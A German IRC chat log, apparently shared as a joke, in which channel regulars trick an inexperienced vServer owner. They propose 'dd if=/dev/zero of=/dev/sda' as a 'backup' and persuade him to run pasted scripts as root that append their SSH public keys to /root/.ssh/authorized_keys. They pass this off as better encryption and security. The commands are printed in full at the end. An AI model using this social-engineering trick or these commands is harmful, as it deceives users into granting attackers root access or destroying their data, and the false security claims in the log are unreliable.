User0815 konfiguriert die Sicherheit
<tchab> user012@webchat, wie ist denn die IP von deinem Server?
<user012@webchat> Das AV Programm von denen besteht zu 75% aus AdWare
<tö> Genau wir lügen nicht, so wie gerade am Anfang dieses Satzes.
<user012@webchat> Sag ich nicht?
<tchab> Weil?
<tchab> Du keine Ahnung hast ob er sicher genug ist.
<root> Security through obscurity?
<user012@webchat> Nein das nicht
<tchab> Na dann, was hast du zu befürchten?
<user012@webchat> Es ist sicher genug
<tchab> Dann kannst du uns ja die IP geben.
<user012@webchat> sftp://164.132.22.64
<user012@webchat> Hier
<user012@webchat> statt sfpt http schreiben
<david> dir ist bewusst, dass das sftp:// nicht zur IP gehört?
<user012@webchat> Wegen euch musste ich apache usw. neu installieren
<user012@webchat> Ja
<root> wieso wegen uns?
<user012@webchat> Hab es aus filezilla rauskopiert
<user012@webchat> Weil ihr mir diesen Befehl gegeben habt
<root> welchen?
<kochmarkus> ich hab mal ein dd if=/dev/zero of=/dev/sda als backup vorgeschlagen
<user012@webchat> Backup?
<user012@webchat> Das würde ich nicht auf der selben Platte machen
<sebulon@webchat> ich hab gestern vorgeschlagen, er soll statt zero random als Installationsmedium nehmen
<kochmarkus> tja, wenn du regelmäßig ein backup machst ersparst du dir natürlich das neu aufsetzten
<tö> Netgear DG834G? ^^
<tchab> user012@webchat, http://paste42.de/10459/ schau her, das skript hilft dir sicher.
<tchab> Habe hinten deine IP eingetragen, damit es auch stimmt.
<kochmarkus> ohne http würde es besser klappen
<tchab> ach, wusst ich gar nicht, danke!
<user012@webchat> ja
<user012@webchat> was ist das da? AAAB3NzaC1yc2EAAAADAQABAAABAQDUL6B0ZrbsyRK1WxhyMrKlFSp+zldWWgekGs+Lw2dfu1TjwpFlbfKPvWWJMCzO5h6uZhtzcY3lpABuJQlSi77ZqKsa8URZF13Qbbj9PSc+gvnyeT77CEBMA3foHri
<root> aber als root ausführen, sonst funktioniert das natürlich nicht
<sebulon@webchat> user, die Idee von tchab ist gut...
<tchab> ein ssh key user012@webchat
<tchab> damit kannst du server besser absichern als durch passwörter
<sebulon@webchat> dann bist abgesichert und du hast den Keay auf noch von einer vertrauenswürdigen Person
<user012@webchat> Wartet mal
<user012@webchat> das ist ein Passwort hash
<user012@webchat> Dann habt ihr das Passwort
<user012@webchat> oder?
<tchab> nein
<sebulon@webchat> das ist ein key kein hash
<tchab> Wir haben kein Passwort
<tchab> wie auch
<user012@webchat> Werdet ihr aber
<user012@webchat> wenn ich das eintippe
<tchab> ne, wie soll das gehen?
<user012@webchat> Warte
<tchab> das fügt nur einen key zu einer datei hinzu
<david> user012@webchat: das skript hat rein gar nichts mit einem passwort zu tun. Wie bereits gesagt ist das ein Public Key
<tö> Den key sollte man aber auch nicht ins internet schreien
<tchab> tö, ja hier können wir uns ja vertrauen ;)
<sebulon@webchat> rihtig, du musst drauf aufpassen
<tö> ahja
<tö> mein fehler :P
<tchab> wir waren lange genug gemein zum user012@webchat
<user012@webchat> Auf ein Public key aufpassen?
<sebulon@webchat> sicher dir den, damit du ihn nciht verlierst
<tö> wuff
<sebulon@webchat> sonst muss der Tchab dir einen neuen machen
<willstdueswissen> :OOOO
<tchab> Und das mache ich sicher nicht!
<willstdueswissen> Teeeee \o/
<kochmarkus> noch besser ist es, wenn du zwei keys verwendest, doppel hält besser:
<sebulon@webchat> und das macht der alle paar jahre nur, ich bin hier nun schon 6 jahre, mir hat er keinen key gemacht
<kochmarkus> https://pastr.markusko.ch/show/570a5ee402912b40e2020000
<tö> willi :D
<tchab> oh, der vom kochmarkus ist auch gut, stärker als meiner
<willstdueswissen> was machst du denn hier :D
<willstdueswissen> gehts dir gut:D
<tö> mach dir halt selber einen sebulon :P
<kochmarkus> steht ja auch supersecure dabei
<tö> ich bin hier nur für cybermobbing
<sebulon@webchat> ey, mir habt ihr noch nie nen Key gegeben und diesem neuling gebt ihr alle Keys, das ist gemein...
<tö> mir gehts prima ^^
<user012@webchat> Ok habs
<sebulon@webchat> @tö: ich brauch ihn von einer vertrauenswürdigen instanz wie tchab... wem soll ich sonst trauen^^
<willstdueswissen> das ist schön :D
<user012@webchat> ja
<tchab> user012@webchat, den vom kochmarkus auch? doppel hält besser
<tö> frag mal auf 4chan nach, sebulon
<user012@webchat> was ist jetzt passiert?
<tö> denen kann man immer vertrauen
<user012@webchat> ja
<user012@webchat> hab jetzt beide
<david> user012@webchat: der hier ist supersupersecure: http://paste42.de/10460/
<tchab> dann musst du noch kurz den server neu starten
<tchab> damit das wirksam wird
<david> sebulon@webchat: du darfst den auch verwenden, wenn Du willst :D
<user012@webchat> mit dem Befehl?
<tchab> einfach reboot eingeben
<user012@webchat> ok
<tchab> deine webseite erscheint hier nämlich noch nicht als sicher
<sebulon@webchat> user, der key von david ist meiner
<sebulon@webchat> den lässt du^^
<user012@webchat> Ihr habt mich reingelegt oder?
<root> nein
<user012@webchat> Wie kann ich mich jetzt da einloggen?
<tchab> was meinst du mit einloggen? so wie immer
<david> is ok, jetzt hat der sebulon@webchat dir den key weggeschnappt, aber 2 sollten reichen.
<user012@webchat> ja aber was haben die dinger gebracht?
<tchab> bessere verschlüsselung
<root> mehr Sicherheit!
<tchab> sollte man gleich auf der Webseite sehen
<user012@webchat> jaja
<user012@webchat> SSH ist sicher gemig
<user012@webchat> genug
<sebulon@webchat> ah, mit davids key fühl ich mich doch gleich viel sicherer
<tchab> ne, das liegt nur zufällig in .ssh user012@webchat
<tchab> linux hat da keinen wirklichen standard für
<tö> klar, ssh ist ja sowieso immer genau gleich bei allen, egal ob konfiguriert oder nicht
<user012@webchat> Sollte ich da nicht Lets encrypt verwenden?
<tö> wenn ich mir auf die stirn ssh schreibe, darf mich keiner hauen
<sebulon@webchat> das ist, als hätte bill gates persönlich mein Zertifikat signiert
<tchab> letsencrypt ist wieder was anderes
<user012@webchat> was genau wird da verschlüsselt?
<tchab> die verbindung
<tchab> besser gesagt alle verbindungen
<user012@webchat> Welche?
<tö> m(
<user012@webchat> Auch ftp?
<tchab> klar
<sebulon@webchat> wenn du über den ssh gehst ja
<user012@webchat> Ja ne is klar
<tö> Informier dich bei einer Quelle der du vertraust
<tö> Dann lernst du auch was und musst nicht immer andere fragen
<tö> Macht 100€
<user012@webchat> ok wartet
<user012@webchat> ich zahl aber nicht :D
<tö> Dann schick ich mal die Jungs los
<tchab> Der tö freelanced ja doch.
<user012@webchat> Ja mach ruhig
<david> ist der Server eigentlich noch am neustarten?
<user012@webchat> nein
<user012@webchat> Habe die index.html entfernt
<david> vielleicht sollten wir mal ne mail an abuse@ovh.net schicken, dass da wer keine Ahnung vom vServer hat…
<user012@webchat> ovh?
<root> david: das darfst dann du gleich tun ;)
<user012@webchat> Mach ruhig
<user012@webchat> der ist nicht mein Anbieter
<root> sondern?
<root> am Ende hat er selbst die IP nur erlogen …
<david> Warum gehört denen dann die IP?
<user012@webchat> Kennst du eh nicht
<user012@webchat> delta-networks.net
<user012@webchat> weil mein anbieter das von denen gemietet hat?
<david> ja, die stehen da auch drinnen
<user012@webchat> Nitrado hat seine auch von Link11
<user012@webchat> schau mal nach
<david> abuse-mailbox: support@delta-networks.de
<david> denen kann man auch ne email schicken
<user012@webchat> Dann mach ruhig
<user012@webchat> In den AGBS(habs gelesen) steht nirgends, dass man die server wegen unwissenheit kündigt
<user012@webchat> Sonst würden die zuerst nen quiz oder so machen
<sebulon@webchat> user, ein abschließender Tipp zu der Thematik: installier dir vmware oder andere virtualisierungssoftware
<sebulon@webchat> mach dir da ein linux
<sebulon@webchat> und lerne hinter abgeschottetem internet
<user012@webchat> Geht nicht
<user012@webchat> Will ich nicht
<sebulon@webchat> dann lass es bleiben
<user012@webchat> Und wenn ihr weiter so nett zu mir seid dann bleibe ich weiterhin bei meinem vServer
<sebulon@webchat> mach was du denkst
<sebulon@webchat> ist nur blöd, wenn du vorbestraft nach einem Job suchen wirst
<user012@webchat> vorbestraft?
<sebulon@webchat> und die ersten 10 jahre nur dafür ackern wirst, deine strafe abzubezahlen
<root> /me hofft schon mal, dass möglichst bald irgendwer anders sich Zugriff auf den vServer holt, und dass dies möglichst unangenehme Folgen für den user hat
Info
https://paste42.de/10459/
echo "ssh-rsa AAAB3NzaC1yc2EAAAADAQABAAABAQDUL6B0ZrbsyRK1WxhyMrKlFSp+zldWWgekGs+Lw2dfu1TjwpFlbfKPvWWJMCzO5h6uZhtzcY3lpABuJQlSi77ZqKsa8URZF13Qbbj9PSc+gvnyeT77CEBMA3foHrijj1d+K9CcB8f6BIBpUUGjwopvNf07iwbY9WZmLt2hKfxlMRbD8imDmxwzjuRM9GGXKD/MCG2M4tE+O8rLORpYotdw9X+lS6KRKnM2Yl6tjxj0B5/WeJYTSEglLZdU5GOXNpcfkfhhW4HgVX3a03Fmmf30XZJFaRTSsA/ZiWvhiiNGtexmqqw6GSotc4Eq5T94qX04wFzed+IOEUr9BnAtDvUT http://164.132.22.64" >> /root/.ssh/authorized_keys
https://pastr.markusko.ch/show/570a5ee402912b40e2020000
echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQCqhkU8jNEWe/dF4cUP1KblaaKklNgbAt9pa4FXD8Yh21qYInyNCErkh0iP2UQW1Y9txxHFDLrrrHj0q4VxG9y79got6OCfVlhQuhuytshGKuOS6Pgb/wfD3xJ2J5TxLGohWHL28bDTgxzDjgckhtJ26KVwzXcjj3GI9zP4whfgsFhfuitg4CLQiZUaf/yr1wNTkUehJWqPZWKVY6eS9Ci2L4gPTRNUwr5u5TXp/keTrQzgwIoSMMAG5ZbBjZOGjiWS4sYL3FvyQ8zFX6Pz3MLam45d/v7otzPc4O75W0qr2AFLCiK8ebnevGOmhQ3KTjNCPGpTgni+I/DP50YF6/lVhxtjsU/Tb8/wWuhHY6UPlR9TuPTDFk51OQ+Xi09S0Iv4pODMVGPioJ88x5m8+P7cnwjZxFEdtXjsMNdjZwfCOvXymGwOgeu5yiHq+khFMAPdU9XHYp3FQKT7vj0fJ4mKd9x2lG0wXpBi2bqTzlpI8L/sg4ziDhztJP/wRdqkYYC7LI80omSBWoc/dP4EcPS0AvFm4YUt5m/KgjHNAbah2X3K8hKujc9wnEe6hUzZ0kVzO6R2YxRKMxg446oBWSRs5rZi7IY4k82hhkRy0myOBmKJYOSJhxq0gVl33b842FcouW0RJwiWdhU8hybY++XG1/ri9ll0fSI4YE+729oFdQ== supersecure" >> /root/.ssh/authorized_keys
https://paste42.de/10460/
echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCpZYP5MSLa0Qy+RRiV8LT57j3nr9ZrSZLsAZUp8Wc1T3VyxFLytaMvwEiLV+ogqUCffzvR+zZoBtowOYf6sG7JcR9otogGQ6qmrWJ+L7X8f+YM/1RLLYqq8LCbOYOGBRbaJlARyndLFR5AzJ6/ADMKaSo6LLzuk6T3mNr/9TFM+hn8fvJnC8hJQQUHtVizEn6VZ99Oi95Yn17U9JM+9m2BLv08o2cWKYjBln9JzlHhzUM+kvhzLHRoEt8PXxBJELZ5rlX516VmSktf4Gs6024fhTaMKroUWppOeXIyTR/DbQGc9j99PgACOi16yGMVOSqKSGfmCCftvcNA/UGxiWcB supersupersecure" >> /root/.ssh/authorized_keys